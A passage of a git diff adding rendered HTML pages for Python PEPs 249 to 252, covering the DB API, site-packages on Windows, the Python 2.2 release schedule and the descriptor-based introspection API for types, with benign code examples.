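A minimal helper in that style might look like the following sketch (not part of the specification; it relies only on the fact that each entry in .description starts with the column name):

def fetch_dicts(cursor):
    # Column names are the first field of each .description entry.
    names = [desc[0] for desc in cursor.description]
    return [dict(zip(names, row)) for row in cursor.fetchall()]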

+

Note that the reason for not extending the DB API specification to +also support dictionary return values for the .fetch*() methods is +that this approach has several drawbacks:

+
    +
  • Some databases don’t support case-sensitive column names or +auto-convert them to all lowercase or all uppercase characters.
  • +
  • Columns in the result set which are generated by the query (e.g. using SQL functions) don’t map to table column names, and databases usually generate names for these columns in a very database-specific way.
  • +
+

As a result, accessing the columns through dictionary keys varies +between databases and makes writing portable code impossible.

+
+
+

Major Changes from Version 1.0 to Version 2.0

+

The Python Database API 2.0 introduces a few major changes compared to +the 1.0 version. Because some of these changes will cause existing DB +API 1.0 based scripts to break, the major version number was adjusted +to reflect this change.

+

These are the most important changes from 1.0 to 2.0:

+
    +
  • The need for a separate dbi module was dropped and the functionality +merged into the module interface itself.
  • +
  • New constructors and Type Objects were added for date/time +values, the RAW Type Object was renamed to BINARY. The +resulting set should cover all basic data types commonly found in +modern SQL databases.
  • +
  • New constants (apilevel, threadsafety, paramstyle) and methods +(.executemany(), .nextset()) were added to provide better +database bindings.
  • +
  • The semantics of .callproc() needed to call stored procedures are +now clearly defined.
  • +
  • The definition of the .execute() return value changed. +Previously, the return value was based on the SQL statement type +(which was hard to implement right) — it is undefined now; use the +more flexible .rowcount attribute instead. Modules are free to +return the old style return values, but these are no longer mandated +by the specification and should be considered database interface +dependent.
  • +
  • Class based exceptions were incorporated into the specification. +Module implementors are free to extend the exception layout defined +in this specification by subclassing the defined exception classes.
  • +
+

Post-publishing additions to the DB API 2.0 specification:

+
    +
  • Additional optional DB API extensions to the set of core +functionality were specified.
  • +
+
+
+

Open Issues

+

Although the version 2.0 specification clarifies a lot of questions +that were left open in the 1.0 version, there are still some remaining +issues which should be addressed in future versions:

+
    +
  • Define a useful return value for .nextset() for the case where a +new result set is available.
  • +
  • Integrate the decimal module Decimal object for use as a loss-less monetary and decimal interchange format.
  • +
+
+
+

Footnotes

+ +
+
+

Acknowledgements

+

Many thanks go to Andrew Kuchling who converted the Python Database +API Specification 2.0 from the original HTML format into the PEP +format in 2001.

+

Many thanks to James Henstridge for leading the discussion which led to +the standardization of the two-phase commit API extensions in 2008.

+

Many thanks to Daniele Varrazzo for converting the specification from text PEP format to ReST PEP format in 2012, which allows linking to various parts of the document.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0249.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0250/index.html b/pep-0250/index.html new file mode 100644 index 00000000000..378c3641b29 --- /dev/null +++ b/pep-0250/index.html @@ -0,0 +1,245 @@ PEP 250 – Using site-packages on Windows | peps.python.org
+
+


+ + +
+
+
+

PEP 250 – Using site-packages on Windows

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
30-Mar-2001
+
+
+
+
+
+

Abstract

+

The standard Python distribution includes a directory +Lib/site-packages, which is used on Unix platforms to hold +locally installed modules and packages. The site.py module +distributed with Python includes support for locating other +modules in the site-packages directory.

+

This PEP proposes that the site-packages directory should be used +on the Windows platform in a similar manner.

+
+
+

Motivation

+

On Windows platforms, the default setting for sys.path does not +include a directory suitable for users to install locally +developed modules. The “expected” location appears to be the +directory containing the Python executable itself. This is also +the location where distutils (and distutils-generated installers) +installs packages. Including locally developed code in the same +directory as installed executables is not good practice.

+

Clearly, users can manipulate sys.path, either in a locally modified site.py, in a suitable sitecustomize.py, or even via .pth files. However, there should be a standard location for such files, rather than relying on every individual site to set its own policy.

+

In addition, with distutils becoming more prevalent as a means of +distributing modules, the need for a standard install location for +distributed modules will become more common. It would be better +to define such a standard now, rather than later when more +distutils-based packages exist which will need rebuilding.

+

It is relevant to note that prior to Python 2.1, the site-packages directory was not included in sys.path for Macintosh platforms. This was changed in 2.1, and the Macintosh now includes site-packages in sys.path, leaving Windows as the only major platform with no site-specific modules directory.

+
+
+

Implementation

+

The implementation of this feature is fairly trivial. All that +would be required is a change to site.py, to change the section +setting sitedirs. The Python 2.1 version has:

+
if os.sep == '/':
+    sitedirs = [makepath(prefix,
+                        "lib",
+                        "python" + sys.version[:3],
+                        "site-packages"),
+                makepath(prefix, "lib", "site-python")]
+elif os.sep == ':':
+    sitedirs = [makepath(prefix, "lib", "site-packages")]
+else:
+    sitedirs = [prefix]
+
+
+

A suitable change would be to simply replace the last 4 lines with:

+
else:
+    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]
+
+
+

Changes would also be required to distutils, to reflect this change +in policy. A patch is available on Sourceforge, patch ID 445744, +which implements this change. Note that the patch checks the Python +version and only invokes the new behaviour for Python versions from +2.2 onwards. This is to ensure that distutils remains compatible +with earlier versions of Python.

+

Finally, the executable code which implements the Windows installer +used by the bdist_wininst command will need changing to use the new +location. A separate patch is available for this, currently +maintained by Thomas Heller.

+
+
+

Notes

+
    +
  • This change does not preclude packages using the current +location – the change only adds a directory to sys.path, it +does not remove anything.
  • +
  • Both the current location (sys.prefix) and the new directory +(site-packages) are included in sitedirs, so that .pth files +will be recognised in either location.
  • +
  • This proposal adds a single additional site-packages directory +to sitedirs. On Unix platforms, two directories are added, one +for version-independent files (Python code) and one for +version-dependent code (C extensions). This is necessary on +Unix, as the sitedirs include a common (across Python versions) +package location, in /usr/local by default. As there is no such +common location available on Windows, there is also no need for +having two separate package directories.
  • +
  • If users want to keep DLLs in a single location on Windows, rather +than keeping them in the package directory, the DLLs subdirectory +of the Python install directory is already available for that +purpose. Adding an extra directory solely for DLLs should not be +necessary.
  • +
+
+
+

Open Issues

+
    +
  • Comments from Unix users indicate that there may be issues with +the current setup on the Unix platform. Rather than become +involved in cross-platform issues, this PEP specifically limits +itself to the Windows platform, leaving changes for other platforms +to be covered in other PEPs.
  • +
  • There could be issues with applications which embed Python. To the +author’s knowledge, there should be no problem as a result of this +change. There have been no comments (supportive or otherwise) from +users who embed Python.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0250.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0251/index.html b/pep-0251/index.html new file mode 100644 index 00000000000..15b174e6ec9 --- /dev/null +++ b/pep-0251/index.html @@ -0,0 +1,208 @@ PEP 251 – Python 2.2 Release Schedule | peps.python.org
+
+


+ + +
+
+
+

PEP 251 – Python 2.2 Release Schedule

+
+
Author:
+
Barry Warsaw <barry at python.org>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
17-Apr-2001
+
Python-Version:
+
2.2
+
Post-History:
+
14-Aug-2001
+
+
+
+
+
+

Abstract

+

This document describes the Python 2.2 development and release +schedule. The schedule primarily concerns itself with PEP-sized +items. Small bug fixes and changes will occur up until the first +beta release.

+

The schedule below represents the actual release dates of Python +2.2. Note that any subsequent maintenance releases of Python 2.2 +should be covered by separate PEPs.

+
+
+

Release Schedule

+

Tentative future release dates. Note that we’ve slipped this +compared to the schedule posted around the release of 2.2a1.

+
    +
  • 21-Dec-2001: 2.2 [Released] (final release)
  • +
  • 14-Dec-2001: 2.2c1 [Released]
  • +
  • 14-Nov-2001: 2.2b2 [Released]
  • +
  • 19-Oct-2001: 2.2b1 [Released]
  • +
  • 28-Sep-2001: 2.2a4 [Released]
  • +
  • 7-Sep-2001: 2.2a3 [Released]
  • +
  • 22-Aug-2001: 2.2a2 [Released]
  • +
  • 18-Jul-2001: 2.2a1 [Released]
  • +
+
+
+

Release Manager

+

Barry Warsaw was the Python 2.2 release manager.

+
+
+

Release Mechanics

+

We experimented with a new mechanism for releases: a week before +every alpha, beta or other release, we forked off a branch which +became the release. Changes to the branch are limited to the +release manager and his designated ‘bots. This experiment was +deemed a success and should be observed for future releases. See +PEP 101 for the actual release mechanics.

+
+
+

New features for Python 2.2

+

The following new features are introduced in Python 2.2. For a +more detailed account, see Misc/NEWS [2] in the Python +distribution, or Andrew Kuchling’s “What’s New in Python 2.2” +document [3].

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0251.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0252/index.html b/pep-0252/index.html new file mode 100644 index 00000000000..53f401d86f5 --- /dev/null +++ b/pep-0252/index.html @@ -0,0 +1,774 @@ PEP 252 – Making Types Look More Like Classes | peps.python.org
+
+


+ + +
+
+
+

PEP 252 – Making Types Look More Like Classes

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Apr-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes changes to the introspection API for types that +makes them look more like classes, and their instances more like +class instances. For example, type(x) will be equivalent to +x.__class__ for most built-in types. When C is x.__class__, +x.meth(a) will generally be equivalent to C.meth(x, a), and +C.__dict__ contains x’s methods and other attributes.

+

This PEP also introduces a new approach to specifying attributes, +using attribute descriptors, or descriptors for short. +Descriptors unify and generalize several different common +mechanisms used for describing attributes: a descriptor can +describe a method, a typed field in the object structure, or a +generalized attribute represented by getter and setter functions.

+

Based on the generalized descriptor API, this PEP also introduces +a way to declare class methods and static methods.

+

[Editor’s note: the ideas described in this PEP have been incorporated +into Python. The PEP no longer accurately describes the implementation.]

+
+
+

Introduction

+

One of Python’s oldest language warts is the difference between +classes and types. For example, you can’t directly subclass the +dictionary type, and the introspection interface for finding out +what methods and instance variables an object has is different for +types and for classes.

+

Healing the class/type split is a big effort, because it affects +many aspects of how Python is implemented. This PEP concerns +itself with making the introspection API for types look the same +as that for classes. Other PEPs will propose making classes look +more like types, and subclassing from built-in types; these topics +are not on the table for this PEP.

+
+
+

Introspection APIs

+

Introspection concerns itself with finding out what attributes an +object has. Python’s very general getattr/setattr API makes it +impossible to guarantee that there always is a way to get a list +of all attributes supported by a specific object, but in practice +two conventions have appeared that together work for almost all +objects. I’ll call them the class-based introspection API and the +type-based introspection API; class API and type API for short.

+

The class-based introspection API is used primarily for class +instances; it is also used by Jim Fulton’s ExtensionClasses. It +assumes that all data attributes of an object x are stored in the +dictionary x.__dict__, and that all methods and class variables +can be found by inspection of x’s class, written as x.__class__. +Classes have a __dict__ attribute, which yields a dictionary +containing methods and class variables defined by the class +itself, and a __bases__ attribute, which is a tuple of base +classes that must be inspected recursively. Some assumptions here +are:

+
    +
  • attributes defined in the instance dict override attributes +defined by the object’s class;
  • +
  • attributes defined in a derived class override attributes +defined in a base class;
  • +
  • attributes in an earlier base class (meaning occurring earlier +in __bases__) override attributes in a later base class.
  • +
+

(The last two rules together are often summarized as the +left-to-right, depth-first rule for attribute search. This is the +classic Python attribute lookup rule. Note that PEP 253 will +propose to change the attribute lookup order, and if accepted, +this PEP will follow suit.)
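A small example of the classic rule, using classic (pre-2.2) classes: with the hierarchy below, D().x is found in A, because B and its bases are searched in full before C is considered:

class A:
    x = 'from A'

class B(A):
    pass

class C:
    x = 'from C'

class D(B, C):
    pass

print(D().x)    # 'from A' under left-to-right, depth-first lookup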

+

The type-based introspection API is supported in one form or +another by most built-in objects. It uses two special attributes, +__members__ and __methods__. The __methods__ attribute, if +present, is a list of method names supported by the object. The +__members__ attribute, if present, is a list of data attribute +names supported by the object.

+

The type API is sometimes combined with a __dict__ that works the +same as for instances (for example for function objects in +Python 2.1, f.__dict__ contains f’s dynamic attributes, while +f.__members__ lists the names of f’s statically defined +attributes).

+

Some caution must be exercised: some objects don’t list their +“intrinsic” attributes (like __dict__ and __doc__) in __members__, +while others do; sometimes attribute names occur both in +__members__ or __methods__ and as keys in __dict__, in which case +it’s anybody’s guess whether the value found in __dict__ is used +or not.

+

The type API has never been carefully specified. It is part of +Python folklore, and most third party extensions support it +because they follow examples that support it. Also, any type that +uses Py_FindMethod() and/or PyMember_Get() in its tp_getattr +handler supports it, because these two functions special-case the +attribute names __methods__ and __members__, respectively.

+

Jim Fulton’s ExtensionClasses ignore the type API, and instead +emulate the class API, which is more powerful. In this PEP, I +propose to phase out the type API in favor of supporting the class +API for all types.

+

One argument in favor of the class API is that it doesn’t require +you to create an instance in order to find out which attributes a +type supports; this in turn is useful for documentation +processors. For example, the socket module exports the SocketType +object, but this currently doesn’t tell us what methods are +defined on socket objects. Using the class API, SocketType would +show exactly what the methods for socket objects are, and we can +even extract their docstrings, without creating a socket. (Since +this is a C extension module, the source-scanning approach to +docstring extraction isn’t feasible in this case.)

+
+
+

Specification of the class-based introspection API

+

Objects may have two kinds of attributes: static and dynamic. The +names and sometimes other properties of static attributes are +knowable by inspection of the object’s type or class, which is +accessible through obj.__class__ or type(obj). (I’m using type +and class interchangeably; a clumsy but descriptive term that fits +both is “meta-object”.)

+

(XXX static and dynamic are not great terms to use here, because +“static” attributes may actually behave quite dynamically, and +because they have nothing to do with static class members in C++ +or Java. Barry suggests to use immutable and mutable instead, but +those words already have precise and different meanings in +slightly different contexts, so I think that would still be +confusing.)

+

Examples of dynamic attributes are instance variables of class +instances, module attributes, etc. Examples of static attributes +are the methods of built-in objects like lists and dictionaries, +and the attributes of frame and code objects (f.f_code, +c.co_filename, etc.). When an object with dynamic attributes +exposes these through its __dict__ attribute, __dict__ is a static +attribute.

+

The names and values of dynamic properties are typically stored in +a dictionary, and this dictionary is typically accessible as +obj.__dict__. The rest of this specification is more concerned +with discovering the names and properties of static attributes +than with dynamic attributes; the latter are easily discovered by +inspection of obj.__dict__.

+

In the discussion below, I distinguish two kinds of objects: +regular objects (like lists, ints, functions) and meta-objects. +Types and classes are meta-objects. Meta-objects are also regular +objects, but we’re mostly interested in them because they are +referenced by the __class__ attribute of regular objects (or by +the __bases__ attribute of other meta-objects).

+

The class introspection API consists of the following elements:

+
    +
  • the __class__ and __dict__ attributes on regular objects;
  • +
  • the __bases__ and __dict__ attributes on meta-objects;
  • +
  • precedence rules;
  • +
  • attribute descriptors.
  • +
+

Together, these not only tell us about all attributes defined by +a meta-object, but they also help us calculate the value of a +specific attribute of a given object.

+
    +
  1. The __dict__ attribute on regular objects

    A regular object may have a __dict__ attribute. If it does, +this should be a mapping (not necessarily a dictionary) +supporting at least __getitem__(), keys(), and has_key(). This +gives the dynamic attributes of the object. The keys in the +mapping give attribute names, and the corresponding values give +their values.

    +

    Typically, the value of an attribute with a given name is the +same object as the value corresponding to that name as a key in +the __dict__. In other words, obj.__dict__['spam'] is obj.spam. +(But see the precedence rules below; a static attribute with +the same name may override the dictionary item.)

    +
  2. The __class__ attribute on regular objects

    A regular object usually has a __class__ attribute. If it +does, this references a meta-object. A meta-object can define +static attributes for the regular object whose __class__ it +is. This is normally done through the following mechanism:

    +
  3. The __dict__ attribute on meta-objects

    A meta-object may have a __dict__ attribute, of the same form +as the __dict__ attribute for regular objects (a mapping but +not necessarily a dictionary). If it does, the keys of the +meta-object’s __dict__ are names of static attributes for the +corresponding regular object. The values are attribute +descriptors; we’ll explain these later. An unbound method is a +special case of an attribute descriptor.

    +

    Because a meta-object is also a regular object, the items in a +meta-object’s __dict__ correspond to attributes of the +meta-object; however, some transformation may be applied, and +bases (see below) may define additional dynamic attributes. In +other words, mobj.spam is not always mobj.__dict__['spam']. +(This rule contains a loophole because for classes, if +C.__dict__['spam'] is a function, C.spam is an unbound method +object.)

    +
  4. The __bases__ attribute on meta-objects

    A meta-object may have a __bases__ attribute. If it does, this +should be a sequence (not necessarily a tuple) of other +meta-objects, the bases. An absent __bases__ is equivalent to +an empty sequence of bases. There must never be a cycle in the +relationship between meta-objects defined by __bases__ +attributes; in other words, the __bases__ attributes define a +directed acyclic graph, with arcs pointing from derived +meta-objects to their base meta-objects. (It is not +necessarily a tree, since multiple classes can have the same +base class.) The __dict__ attributes of a meta-object in the +inheritance graph supply attribute descriptors for the regular +object whose __class__ attribute points to the root of the +inheritance tree (which is not the same as the root of the +inheritance hierarchy – rather more the opposite, at the +bottom given how inheritance trees are typically drawn). +Descriptors are first searched in the dictionary of the root +meta-object, then in its bases, according to a precedence rule +(see the next paragraph).

    +
  5. Precedence rules

    When two meta-objects in the inheritance graph for a given +regular object both define an attribute descriptor with the +same name, the search order is up to the meta-object. This +allows different meta-objects to define different search +orders. In particular, classic classes use the old +left-to-right depth-first rule, while new-style classes use a +more advanced rule (see the section on method resolution order +in PEP 253).

    +

    When a dynamic attribute (one defined in a regular object’s +__dict__) has the same name as a static attribute (one defined +by a meta-object in the inheritance graph rooted at the regular +object’s __class__), the static attribute has precedence if it +is a descriptor that defines a __set__ method (see below); +otherwise (if there is no __set__ method) the dynamic attribute +has precedence. In other words, for data attributes (those +with a __set__ method), the static definition overrides the +dynamic definition, but for other attributes, dynamic overrides +static.

    +

    Rationale: we can’t have a simple rule like “static overrides +dynamic” or “dynamic overrides static”, because some static +attributes indeed override dynamic attributes; for example, a +key ‘__class__’ in an instance’s __dict__ is ignored in favor +of the statically defined __class__ pointer, but on the other +hand most keys in inst.__dict__ override attributes defined in +inst.__class__. Presence of a __set__ method on a descriptor +indicates that this is a data descriptor. (Even read-only data +descriptors have a __set__ method: it always raises an +exception.) Absence of a __set__ method on a descriptor +indicates that the descriptor isn’t interested in intercepting +assignment, and then the classic rule applies: an instance +variable with the same name as a method hides the method until +it is deleted.

    +
  6. Attribute descriptors

    This is where it gets interesting – and messy. Attribute +descriptors (descriptors for short) are stored in the +meta-object’s __dict__ (or in the __dict__ of one of its +ancestors), and have two uses: a descriptor can be used to get +or set the corresponding attribute value on the (regular, +non-meta) object, and it has an additional interface that +describes the attribute for documentation and introspection +purposes.

    +

    There is little prior art in Python for designing the +descriptor’s interface, neither for getting/setting the value +nor for describing the attribute otherwise, except some trivial +properties (it’s reasonable to assume that __name__ and __doc__ +should be the attribute’s name and docstring). I will propose +such an API below.

    +

    If an object found in the meta-object’s __dict__ is not an +attribute descriptor, backward compatibility dictates certain +minimal semantics. This basically means that if it is a Python +function or an unbound method, the attribute is a method; +otherwise, it is the default value for a dynamic data +attribute. Backwards compatibility also dictates that (in the +absence of a __setattr__ method) it is legal to assign to an +attribute corresponding to a method, and that this creates a +data attribute shadowing the method for this particular +instance. However, these semantics are only required for +backwards compatibility with regular classes.

    +
+

The introspection API is a read-only API. We don’t define the +effect of assignment to any of the special attributes (__dict__, +__class__ and __bases__), nor the effect of assignment to the +items of a __dict__. Generally, such assignments should be +considered off-limits. A future PEP may define some semantics for +some such assignments. (Especially because currently instances +support assignment to __class__ and __dict__, and classes support +assignment to __bases__ and __dict__.)
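The precedence rule between static and dynamic attributes can be observed directly. The following sketch uses the descriptor machinery in its final (post-2.2) form:

class ReadOnly(object):
    # A data descriptor: it defines __set__, so the static
    # attribute takes precedence over the instance __dict__.
    def __get__(self, obj, cls=None):
        return 'static value'
    def __set__(self, obj, value):
        raise AttributeError('read-only attribute')

class C(object):
    attr = ReadOnly()

c = C()
c.__dict__['attr'] = 'dynamic value'  # plant a dynamic attribute directly
print(c.attr)                         # 'static value': the data descriptor wins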

+
+
+

Specification of the attribute descriptor API

+

Attribute descriptors may have the following attributes. In the +examples, x is an object, C is x.__class__, x.meth() is a method, +and x.ivar is a data attribute or instance variable. All +attributes are optional – a specific attribute may or may not be +present on a given descriptor. An absent attribute means that the +corresponding information is not available or the corresponding +functionality is not implemented.

+
    +
  • __name__: the attribute name. Because of aliasing and renaming, +the attribute may (additionally or exclusively) be known under a +different name, but this is the name under which it was born. +Example: C.meth.__name__ == 'meth'.
  • +
  • __doc__: the attribute’s documentation string. This may be +None.
  • +
  • __objclass__: the class that declared this attribute. The +descriptor only applies to objects that are instances of this +class (this includes instances of its subclasses). Example: +C.meth.__objclass__ is C.
  • +
  • __get__(): a function callable with one or two arguments that retrieves the attribute value from an object. This is also referred to as a “binding” operation, because it may return a “bound method” object in the case of method descriptors. The first argument, X, is the object from which the attribute must be retrieved or to which it must be bound. When X is None, the optional second argument, T, should be a meta-object, and the binding operation may return an unbound method restricted to instances of T. When both X and T are specified, X should be an instance of T. Exactly what is returned by the binding operation depends on the semantics of the descriptor; for example, static methods and class methods (see below) ignore the instance and bind to the type instead.
  • +
  • __set__(): a function of two arguments that sets the attribute +value on the object. If the attribute is read-only, this method +may raise a TypeError or AttributeError exception (both are +allowed, because both are historically found for undefined or +unsettable attributes). Example: +C.ivar.set(x, y) ~~ x.ivar = y.
  • +
+
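Most of these attributes can be inspected on real method descriptors. The following interactive sketch shows them on list.append (output from a present-day CPython; the PEP-era details differed slightly):

>>> list.append.__name__
'append'
>>> list.append.__objclass__ is list
True
>>> L = []
>>> bound = list.append.__get__(L, list)   # the binding operation
>>> bound('spam')                          # same as L.append('spam')
>>> L
['spam']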
+
+

Static methods and class methods

+

The descriptor API makes it possible to add static methods and +class methods. Static methods are easy to describe: they behave +pretty much like static methods in C++ or Java. Here’s an +example:

+
class C:
+
+    def foo(x, y):
+        print "staticmethod", x, y
+    foo = staticmethod(foo)
+
+C.foo(1, 2)
+c = C()
+c.foo(1, 2)
+
+
+

Both the call C.foo(1, 2) and the call c.foo(1, 2) call foo() with +two arguments, and print “staticmethod 1 2”. No “self” is declared in +the definition of foo(), and no instance is required in the call.

+

The line “foo = staticmethod(foo)” in the class statement is the +crucial element: this makes foo() a static method. The built-in +staticmethod() wraps its function argument in a special kind of +descriptor whose __get__() method returns the original function +unchanged. Without this, the __get__() method of standard +function objects would have created a bound method object for +‘c.foo’ and an unbound method object for ‘C.foo’.

+

(XXX Barry suggests to use “sharedmethod” instead of +“staticmethod”, because the word static is being overloaded in so +many ways already. But I’m not sure if shared conveys the right +meaning.)

+

Class methods use a similar pattern to declare methods that +receive an implicit first argument that is the class for which +they are invoked. This has no C++ or Java equivalent, and is not +quite the same as what class methods are in Smalltalk, but may +serve a similar purpose. According to Armin Rigo, they are +similar to “virtual class methods” in Borland Pascal dialect +Delphi. (Python also has real metaclasses, and perhaps methods +defined in a metaclass have more right to the name “class method”; +but I expect that most programmers won’t be using metaclasses.) +Here’s an example:

+
class C:
+
+    def foo(cls, y):
+        print "classmethod", cls, y
+    foo = classmethod(foo)
+
+C.foo(1)
+c = C()
+c.foo(1)
+
+
+

Both the call C.foo(1) and the call c.foo(1) end up calling foo() +with two arguments, and print “classmethod __main__.C 1”. The +first argument of foo() is implied, and it is the class, even if +the method was invoked via an instance. Now let’s continue the +example:

+
class D(C):
+    pass
+
+D.foo(1)
+d = D()
+d.foo(1)
+
+
+

This prints “classmethod __main__.D 1” both times; in other words, +the class passed as the first argument of foo() is the class +involved in the call, not the class involved in the definition of +foo().

+

But notice this:

+
class E(C):
+    def foo(cls, y): # override C.foo
+        print "E.foo() called"
+        C.foo(y)
+    foo = classmethod(foo)
+
+E.foo(1)
+e = E()
+e.foo(1)
+
+
+

In this example, the call to C.foo() from E.foo() will see class C +as its first argument, not class E. This is to be expected, since +the call specifies the class C. But it stresses the difference +between these class methods and methods defined in metaclasses, +where an upcall to a metamethod would pass the target class as an +explicit first argument. (If you don’t understand this, don’t +worry, you’re not alone.) Note that calling cls.foo(y) would be a +mistake – it would cause infinite recursion. Also note that you +can’t specify an explicit ‘cls’ argument to a class method. If +you want this (e.g. the __new__ method in PEP 253 requires this), +use a static method with a class as its explicit first argument +instead.

+
+
+

C API

+

XXX The following is VERY rough text that I wrote with a different +audience in mind; I’ll have to go through this to edit it more. +XXX It also doesn’t go into enough detail for the C API.

+

A built-in type can declare special data attributes in two ways: +using a struct memberlist (defined in structmember.h) or a struct +getsetlist (defined in descrobject.h). The struct memberlist is +an old mechanism put to new use: each attribute has a descriptor +record including its name, an enum giving its type (various C +types are supported as well as PyObject *), an offset from the +start of the instance, and a read-only flag.

+

The struct getsetlist mechanism is new, and intended for cases +that don’t fit in that mold, because they either require +additional checking, or are plain calculated attributes. Each +attribute here has a name, a getter C function pointer, a setter C +function pointer, and a context pointer. The function pointers +are optional, so that for example setting the setter function +pointer to NULL makes a read-only attribute. The context pointer +is intended to pass auxiliary information to generic getter/setter +functions, but I haven’t found a need for this yet.

+

Note that there is also a similar mechanism to declare built-in +methods: these are PyMethodDef structures, which contain a name +and a C function pointer (and some flags for the calling +convention).

+

Traditionally, built-in types have had to define their own +tp_getattro and tp_setattro slot functions to make these attribute +definitions work (PyMethodDef and struct memberlist are quite +old). There are convenience functions that take an array of +PyMethodDef or memberlist structures, an object, and an attribute +name, and return or set the attribute if found in the list, or +raise an exception if not found. But these convenience functions +had to be explicitly called by the tp_getattro or tp_setattro +method of the specific type, and they did a linear search of the +array using strcmp() to find the array element describing the +requested attribute.

+

I now have a brand spanking new generic mechanism that improves +this situation substantially.

+
    +
  • Pointers to arrays of PyMethodDef, memberlist, getsetlist +structures are part of the new type object (tp_methods, +tp_members, tp_getset).
  • +
  • At type initialization time (in PyType_InitDict()), for each +entry in those three arrays, a descriptor object is created and +placed in a dictionary that belongs to the type (tp_dict).
  • +
  • Descriptors are very lean objects that mostly point to the +corresponding structure. An implementation detail is that all +descriptors share the same object type, and a discriminator +field tells what kind of descriptor it is (method, member, or +getset).
  • +
  • As explained in PEP 252, descriptors have a get() method that takes an object argument and returns that object’s attribute; descriptors for writable attributes also have a set() method that takes an object and a value and sets that object’s attribute. Note that the get() method also serves as a bind() operation for methods, binding the unbound method implementation to the object.
  • +
  • Instead of providing their own tp_getattro and tp_setattro +implementation, almost all built-in objects now place +PyObject_GenericGetAttr and (if they have any writable +attributes) PyObject_GenericSetAttr in their tp_getattro and +tp_setattro slots. (Or, they can leave these NULL, and inherit +them from the default base object, if they arrange for an +explicit call to PyType_InitDict() for the type before the first +instance is created.)
  • +
  • In the simplest case, PyObject_GenericGetAttr() does exactly one +dictionary lookup: it looks up the attribute name in the type’s +dictionary (obj->ob_type->tp_dict). Upon success, there are two +possibilities: the descriptor has a get method, or it doesn’t. +For speed, the get and set methods are type slots: tp_descr_get +and tp_descr_set. If the tp_descr_get slot is non-NULL, it is +called, passing the object as its only argument, and the return +value from this call is the result of the getattr operation. If +the tp_descr_get slot is NULL, as a fallback the descriptor +itself is returned (compare class attributes that are not +methods but simple values).
  • +
  • PyObject_GenericSetAttr() works very similar but uses the +tp_descr_set slot and calls it with the object and the new +attribute value; if the tp_descr_set slot is NULL, an +AttributeError is raised.
  • +
  • But now for a more complicated case. The approach described +above is suitable for most built-in objects such as lists, +strings, numbers. However, some object types have a dictionary +in each instance that can store arbitrary attributes. In fact, +when you use a class statement to subtype an existing built-in +type, you automatically get such a dictionary (unless you +explicitly turn it off, using another advanced feature, +__slots__). Let’s call this the instance dict, to distinguish +it from the type dict.
  • +
  • In the more complicated case, there’s a conflict between names +stored in the instance dict and names stored in the type dict. +If both dicts have an entry with the same key, which one should +we return? Looking at classic Python for guidance, I find +conflicting rules: for class instances, the instance dict +overrides the class dict, except for the special attributes +(like __dict__ and __class__), which have priority over the +instance dict.
  • +
  • I resolved this with the following set of rules, implemented in +PyObject_GenericGetAttr():
      +
    1. Look in the type dict. If you find a data descriptor, use +its get() method to produce the result. This takes care of +special attributes like __dict__ and __class__.
    2. Look in the instance dict. If you find anything, that’s it. (This takes care of the requirement that normally the instance dict overrides the class dict.)
    3. Look in the type dict again (in reality this uses the saved result from step 1, of course). If you find a descriptor, use its get() method; if you find something else, that’s it; if it’s not there, raise AttributeError.
    +

    This requires a classification of descriptors as data and +nondata descriptors. The current implementation quite sensibly +classifies member and getset descriptors as data (even if they +are read-only!) and method descriptors as nondata. +Non-descriptors (like function pointers or plain values) are +also classified as non-data (!).

    +
  • +
  • This scheme has one drawback: in what I assume to be the most +common case, referencing an instance variable stored in the +instance dict, it does two dictionary lookups, whereas the +classic scheme did a quick test for attributes starting with two +underscores plus a single dictionary lookup. (Although the +implementation is sadly structured as instance_getattr() calling +instance_getattr1() calling instance_getattr2() which finally +calls PyDict_GetItem(), and the underscore test calls +PyString_AsString() rather than inlining this. I wonder if +optimizing the snot out of this might not be a good idea to +speed up Python 2.2, if we weren’t going to rip it all out. :-)
  • +
  • A benchmark verifies that in fact this is as fast as classic +instance variable lookup, so I’m no longer worried.
  • +
  • Modification for dynamic types: steps 1 and 3 look in the dictionary of the type and all its base classes (in MRO sequence, of course).
  • +
+
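Ignoring the MRO walk over base classes, the lookup rules above can be summarized in Python. This is a rough sketch of the logic, not the C implementation:

def generic_getattr(obj, name):
    tp = type(obj)
    descr = tp.__dict__.get(name)            # step 1: type dict
    if descr is not None and hasattr(descr, '__set__'):
        return descr.__get__(obj, tp)        # data descriptor wins
    inst_dict = getattr(obj, '__dict__', {})
    if name in inst_dict:                    # step 2: instance dict
        return inst_dict[name]
    if descr is not None:                    # step 3: type dict again
        if hasattr(descr, '__get__'):
            return descr.__get__(obj, tp)    # non-data descriptor
        return descr                         # plain value
    raise AttributeError(name)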
+
+

Discussion

+

XXX

+
+
+

Examples

+

Let’s look at lists. In classic Python, the method names of +lists were available as the __methods__ attribute of list objects:

+
>>> [].__methods__
+['append', 'count', 'extend', 'index', 'insert', 'pop',
+'remove', 'reverse', 'sort']
+>>>
+
+
+

Under the new proposal, the __methods__ attribute no longer exists:

+
>>> [].__methods__
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+AttributeError: 'list' object has no attribute '__methods__'
+>>>
+
+
+

Instead, you can get the same information from the list type:

+
>>> T = [].__class__
+>>> T
+<type 'list'>
+>>> dir(T)                # like T.__dict__.keys(), but sorted
+['__add__', '__class__', '__contains__', '__eq__', '__ge__',
+'__getattr__', '__getitem__', '__getslice__', '__gt__',
+'__iadd__', '__imul__', '__init__', '__le__', '__len__',
